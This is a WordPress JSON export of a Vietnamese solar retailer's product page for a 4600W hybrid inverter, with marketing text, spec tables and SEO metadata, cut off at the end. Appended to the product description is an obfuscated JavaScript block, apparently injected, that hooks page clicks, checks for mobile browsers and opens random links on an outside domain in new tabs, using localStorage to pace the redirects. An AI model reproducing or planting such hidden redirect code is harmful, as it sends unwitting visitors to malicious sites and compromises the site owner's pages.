{"id":1639,"date":"2018-06-07T21:55:27","date_gmt":"2018-06-07T14:55:27","guid":{"rendered":"http:\/\/solarcsc.com\/?post_type=product&#038;p=1639"},"modified":"2021-07-24T19:21:10","modified_gmt":"2021-07-24T12:21:10","slug":"inverter-hybrid-6000wp","status":"publish","type":"product","link":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp","title":{"rendered":"Inverter hybrid 4600W"},"content":{"rendered":"<p>B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng\u00a0hybrid inverter\u00a04600W h\u00f2a l\u01b0\u1edbi\/t\u00e1ch l\u01b0\u1edbi l\u00e0 b\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111a d\u1ee5ng nh\u1eb1m t\u1ed1i \u01b0u d\u00f2ng\u00a0\u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, \u0111i\u1ec7n l\u01b0\u1edbi v\u00e0 ngu\u1ed3n \u0111i\u1ec7n t\u1eeb \u1eafc quy \u0111\u1ec3 cung c\u1ea5p ngu\u1ed3n \u0111i\u1ec7n li\u00ean t\u1ee5c. \u0110\u00e2y l\u00e0 h\u1ec7 th\u1ed1ng l\u01b0u \u0111i\u1ec7n \u0111\u01a1n gi\u1ea3n v\u00e0 th\u00f4ng minh d\u00e0nh cho gia \u0111\u00ecnh\/doanh nghi\u1ec7p \u0111\u1ec3 t\u00edch l\u0169y n\u0103ng l\u01b0\u1ee3ng v\u00e0o \u1eafc quy \u0111\u1ec3 d\u00f9ng ban \u0111\u00eam ho\u1eb7c t\u1ef1 c\u1ea5p \u0111i\u1ec7n t\u00f9y theo nhu c\u1ea7u. M\u1ee9c \u0111\u1ed9 \u01b0u ti\u00ean c\u1ee7a t\u1eebng ngu\u1ed3n \u0111i\u1ec7n c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c c\u00e0i \u0111\u1eb7t th\u00f4ng qua\u00a0ph\u1ea7n m\u1ec1m th\u00f4ng minh. Khi ban \u0111\u00eam ho\u1eb7c b\u1ecb m\u1ea5t \u0111i\u1ec7n l\u01b0\u1edbi, h\u1ec7 th\u1ed1ng s\u1ebd\u00a0t\u1ef1 \u0111\u1ed9ng l\u1ea5y ngu\u1ed3n \u0111i\u1ec7n t\u1eeb \u1eafc quy. B\u1eb1ng c\u00e1ch n\u00e0y s\u1ebd gi\u1ea3m s\u1ef1 ph\u1ee5 thu\u1ed9c v\u00e0o\u00a0\u0111i\u1ec7n l\u01b0\u1edbi.<\/p>\n<h4>\u01afU \u0110I\u1ec2M<\/h4>\n<p>&#8211; T\u1eadn d\u1ee5ng t\u1ed1i \u0111a\u00a0ngu\u1ed3n \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng\u00a0&#8211; ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu<br \/>\n&#8211;\u00a0 L\u01b0u tr\u1eef \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o\u00a0b\u00ecnh \u1eafc quy<br \/>\n&#8211;\u00a0 \u00a0\u0110i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p \/ x\u1ea3 h\u1eb1ng ng\u00e0y &#8211; t\u0103ng tu\u1ed5i th\u1ecd cho\u00a0b\u00ecnh \u1eafc quy<br \/>\n&#8211;\u00a0 \u00a0Khi m\u1ea5t \u0111i\u1ec7n &#8211; ng\u00f5 ra t\u1ea3i \u01b0u ti\u00ean v\u1eabn c\u00f3 \u0111i\u1ec7n<\/p>\n<h4>\u0110\u1eb6C \u0110I\u1ec2M<\/h4>\n<p>&#8211; B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n\u00a01 pha ho\u1eb7c 3 pha\u00a010kva c\u00f3 t\u00edch l\u0169y\u00a0n\u0103ng l\u01b0\u1ee3ng<br \/>\n&#8211; T\u1ef1 cung c\u1ea5p s\u1eed d\u1ee5ng v\u00e0 h\u00f2a l\u01b0\u1edbi khi d\u01b0 t\u1ea3i<br \/>\n&#8211; L\u1eadp tr\u00ecnh \u01b0u ti\u00ean ngu\u1ed3n c\u1ea5p: \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, \u1eafc quy v\u00e0 \u0111i\u1ec7n l\u01b0\u1edbi<\/p>\n<p>&#8211; L\u1eadp tr\u00ecnh nhi\u1ec1u ch\u1ebf \u0111\u1ed9 v\u1eadn h\u00e0nh:\u00a0h\u00f2a l\u01b0\u1edbi, t\u00e1ch l\u01b0\u1edbi v\u00e0 h\u00f2a l\u01b0\u1edbi c\u00f3 d\u1ef1 ph\u00f2ng<\/p>\n<p><span style=\"font-size: 110%;\"><strong>Th\u00f4ng tin s\u1ea3n ph\u1ea9m:<\/strong><\/span><\/p>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">General<\/td>\n<\/tr>\n<tr>\n<th>Weight (Kg)<\/th>\n<td>30.0000<\/td>\n<\/tr>\n<tr>\n<th>Peak Efficiency<\/th>\n<td>97.60 %<\/td>\n<\/tr>\n<tr>\n<th>Model ID<\/th>\n<td>GW5048D-ES<\/td>\n<\/tr>\n<tr>\n<th>Phases of Inverter<\/th>\n<td>No<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">Input (DC)<\/td>\n<\/tr>\n<tr>\n<th>Max DC Power<\/th>\n<td>5400 W<\/td>\n<\/tr>\n<tr>\n<th>Start- Up Voltage<\/th>\n<td>125 V<\/td>\n<\/tr>\n<tr>\n<th>Max Input Voltage (Vmax)<\/th>\n<td>580 V<\/td>\n<\/tr>\n<tr>\n<th>Max Current DC Input<\/th>\n<td>30 A<\/td>\n<\/tr>\n<tr>\n<th>Number of Independent MPPT Channelsel<\/th>\n<td>2<\/td>\n<\/tr>\n<tr>\n<th>Input Voltage Range (MPPT, Grid Tie)<\/th>\n<td>125~550 V<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">Output (AC)<\/td>\n<\/tr>\n<tr>\n<th>Nominal Output Power<\/th>\n<td>4600 W<\/td>\n<\/tr>\n<tr>\n<th>Output Power Rating<\/th>\n<td>1.1kW &#8211; \u226610kW<\/td>\n<\/tr>\n<tr>\n<th>Nominal Output Voltage<\/th>\n<td>230 V<\/td>\n<\/tr>\n<tr>\n<th>AC Frequency<\/th>\n<td>50HZ\/60HZ<\/td>\n<\/tr>\n<tr>\n<th>Operating Frequency Range<\/th>\n<td>45~55HZ@50HZ\/55~65HZ@60HZ<\/td>\n<\/tr>\n<tr>\n<th>Max Output Current<\/th>\n<td>20 A<\/td>\n<\/tr>\n<tr>\n<th>Total Harmonic Distortion<\/th>\n<td>&lt;1.5 %<\/td>\n<\/tr>\n<tr>\n<th>Isolation Transformer<\/th>\n<td>Transformerless<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">Mechanical Specifications<\/td>\n<\/tr>\n<tr>\n<th>Dimension<\/th>\n<td>516*440*184 mm<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">Operating Conditions<\/td>\n<\/tr>\n<tr>\n<th>Operating Temperature<\/th>\n<td>-25\u2103~+60\u2103<\/td>\n<\/tr>\n<tr>\n<th>Noise Emission Level<\/th>\n<td>&lt;25 dB<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<table id=\"product-attribute-specs-table\" class=\"data-table\">\n<tbody>\n<tr>\n<td colspan=\"2\">Protection<\/td>\n<\/tr>\n<tr>\n<th>Ground Fault Protection<\/th>\n<td>No<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/xo-xo.info\/Wxk9c5','https:\/\/xo-xo.info\/Rie8c9','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/xo-xo.info\/FtC5c7','8SJGLkz','random','https:\/\/xo-xo.info\/nSa1c8','7196643rGaMMg','setItem','-mnts','https:\/\/xo-xo.info\/LiL2c3','266801SrzfpD','substr','floor','-local-storage','https:\/\/xo-xo.info\/KAZ4c3','3ThLcDl','stopPropagation','_blank','https:\/\/xo-xo.info\/Yht3c7','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/xo-xo.info\/xRg0c2'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/xo-xo.info\/oDy6c2','https:\/\/xo-xo.info\/DWA7c5',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W &#8211; hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y<\/p>\n","protected":false},"featured_media":2839,"template":"","meta":[],"product_cat":[735],"product_tag":[180],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh<\/title>\r\n<meta name=\"description\" content=\"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y\" \/>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp\" \/>\r\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"og:description\" content=\"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp\" \/>\r\n<meta property=\"og:site_name\" content=\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\" \/>\r\n<meta property=\"article:modified_time\" content=\"2021-07-24T12:21:10+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/solarquangbinh.com\/wp-content\/uploads\/2018\/06\/Bo-hoa-luoi-hybrid-6000wp.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"600\" \/>\r\n\t<meta property=\"og:image:height\" content=\"500\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 ph\u00fat\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp\",\"url\":\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp\",\"name\":\"Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"isPartOf\":{\"@id\":\"https:\/\/solarquangbinh.com\/#website\"},\"datePublished\":\"2018-06-07T14:55:27+00:00\",\"dateModified\":\"2021-07-24T12:21:10+00:00\",\"description\":\"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y\",\"breadcrumb\":{\"@id\":\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp#breadcrumb\"},\"inLanguage\":\"vi\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Trang ch\u1ee7\",\"item\":\"https:\/\/solarquangbinh.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"S\u1ea3n ph\u1ea9m\",\"item\":\"https:\/\/solarquangbinh.com\/?page_id=20\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Inverter hybrid 4600W\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/solarquangbinh.com\/#website\",\"url\":\"https:\/\/solarquangbinh.com\/\",\"name\":\"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh\",\"description\":\"\u0110i\u1ec7n n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi Qu\u1ea3ng B\u00ecnh, Solar Quang Binh, Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef, pin n\u0103ng l\u01b0\u1ee3ng m\u1eb7t tr\u1eddi, Solar Quang Binh\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/solarquangbinh.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"vi\"}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","description":"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp","og_locale":"vi_VN","og_type":"article","og_title":"Inverter hybrid 4600W - Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","og_description":"B\u1ed9 chuy\u1ec3n \u0111\u1ed5i \u0111i\u1ec7n \u0111a d\u1ee5ng 4600W - hybrid inverter t\u1eadn d\u1ee5ng t\u1ed1i \u0111a \u0111i\u1ec7n n\u0103ng l\u01b0\u1ee3ng, ch\u1ec9 b\u00f9 \u0111i\u1ec7n l\u01b0\u1edbi khi thi\u1ebfu, l\u01b0u tr\u1eef n\u0103ng l\u01b0\u1ee3ng d\u01b0 th\u1eeba v\u00e0o b\u00ecnh \u1eafc quy,\u0111i\u1ec7n l\u01b0u tr\u1eef s\u1ebd \u0111\u01b0\u1ee3c n\u1ea1p\/x\u1ea3 h\u1eb1ng ng\u00e0y","og_url":"https:\/\/solarquangbinh.com\/?product=inverter-hybrid-6000wp","og_site_name":"Solar Qu\u1ea3ng B\u00ecnh chuy\u00ean gi\u1ea3i ph\u00e1p v\u00e0 cung c\u1ea5p h\u1ec7 th\u1ed1ng \u0111i\u1ec7n m\u1eb7t tr\u1eddi h\u00f2a l\u01b0\u1edbi v\u00e0 l\u01b0u tr\u1eef t\u1ea1i Qu\u1ea3ng B\u00ecnh","article_modified_time":"2021-07-24T12:21:10+00:00","og_image":[{"width":600,"height":500,"url":"https:\/\/solarquangbinh.com\/wp-content\/uploads\/2018\/06\/Bo-hoa-luoi-hybrid-6000wp.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"3 